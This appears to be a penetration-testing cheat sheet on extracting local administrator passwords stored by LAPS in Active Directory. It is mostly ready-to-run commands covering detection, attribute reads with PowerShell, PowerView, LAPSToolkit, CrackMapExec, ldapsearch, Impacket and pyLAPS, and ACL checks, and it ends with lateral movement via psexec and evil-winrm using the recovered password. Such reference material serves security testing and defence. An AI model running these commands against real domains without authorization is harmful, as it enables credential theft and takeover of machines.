> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# LAPS Enumeration

> Extracting local admin passwords from LAPS: enumeration, reading ms-Mcs-AdmPwd, and LAPS v2.

## Overview

LAPS (Local Administrator Password Solution) manages local admin passwords on domain-joined machines. Passwords are stored in Active Directory as the `ms-Mcs-AdmPwd` attribute. If you have read access to this attribute, you get the local admin password in cleartext.

***

## Check if LAPS is Installed

### On Target

```cmd theme={"dark"}
reg query "HKLM\SOFTWARE\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled 2>nul
```

```powershell theme={"dark"}
Get-ChildItem 'C:\Program Files\LAPS\CSE\AdmPwd.dll' -ErrorAction SilentlyContinue
```

```cmd theme={"dark"}
dir "C:\Program Files\LAPS" 2>nul
```

### Check AD Schema

```powershell theme={"dark"}
Get-ADObject "CN=ms-Mcs-AdmPwd,CN=Schema,CN=Configuration,DC=domain,DC=local" -ErrorAction SilentlyContinue
```

***

## Read LAPS Password

### PowerShell (AD Module)

```powershell theme={"dark"}
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime | Where-Object { $_.'ms-Mcs-AdmPwd' -ne $null } | Select Name, 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime'
```

### Specific Computer

```powershell theme={"dark"}
Get-ADComputer TARGET-PC -Properties ms-Mcs-AdmPwd | Select Name, 'ms-Mcs-AdmPwd'
```

### PowerView

```powershell theme={"dark"}
Get-DomainComputer -Properties samaccountname,ms-mcs-admpwd | Where-Object { $_.'ms-mcs-admpwd' -ne $null }
```

### LAPS Toolkit

```bash theme={"dark"}
https://github.com/leoloobeek/LAPSToolkit
```

```powershell theme={"dark"}
Import-Module .\LAPSToolkit.ps1

# Find computers with LAPS
Find-LAPSDelegatedGroups
Find-AdmPwdExtendedRights

# Get passwords
Get-LAPSComputers
```

***

## From Linux (Remote)

### CrackMapExec

```bash theme={"dark"}
crackmapexec ldap DC_IP -u user -p password --module laps
```

### ldapsearch

```bash theme={"dark"}
ldapsearch -x -H ldap://DC_IP -D "user@domain.local" -w "password" -b "DC=domain,DC=local" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd ms-MCS-AdmPwdExpirationTime sAMAccountName
```

### Impacket

`GetADUsers` only enumerates user accounts — it won't read LAPS attributes. Use `GetLAPSPassword`:

```bash theme={"dark"}
impacket-GetLAPSPassword domain.local/user:password -dc-ip DC_IP
```

### pyLAPS

```bash theme={"dark"}
https://github.com/p0dalirius/pyLAPS

python3 pyLAPS.py -u user -p password -d domain.local --dc-ip DC_IP
```

***

## LAPS v2 (Windows LAPS)

Windows LAPS (newer) stores the password as a JSON blob in the `msLAPS-Password` attribute in **clear text**. When password encryption is enabled, the value moves to the separate `msLAPS-EncryptedPassword` attribute.

### Check

```powershell theme={"dark"}
Get-ADComputer -Filter * -Properties msLAPS-Password | Where-Object { $_.'msLAPS-Password' -ne $null }
```

### Read with Authorized Account

```powershell theme={"dark"}
Get-LapsADPassword -Identity TARGET-PC -AsPlainText
```

***

## Who Can Read LAPS?

### Find Delegated Groups

```powershell theme={"dark"}
Find-AdmPwdExtendedRights -Identity "OU=Workstations,DC=domain,DC=local"
```

### Check ACLs

```powershell theme={"dark"}
(Get-ACL "AD:CN=TARGET-PC,OU=Computers,DC=domain,DC=local").Access | Where-Object { $_.ObjectType -match ".*AdmPwd.*" }
```

***

## Post-Exploitation

```bash theme={"dark"}
# Use found password
crackmapexec smb TARGET -u Administrator -p 'LAPSPassword123'
impacket-psexec domain.local/Administrator:'LAPSPassword123'@TARGET
evil-winrm -i TARGET -u Administrator -p 'LAPSPassword123'
```

***

## Quick Reference

| Tool                 | Where    | Notes                 |
| -------------------- | -------- | --------------------- |
| PowerShell AD module | Target   | Get-ADComputer        |
| PowerView            | Target   | Get-DomainComputer    |
| LAPSToolkit          | Target   | Find delegated groups |
| CrackMapExec         | Attacker | --module laps         |
| ldapsearch           | Attacker | Direct LDAP query     |
| pyLAPS               | Attacker | Standalone Python     |
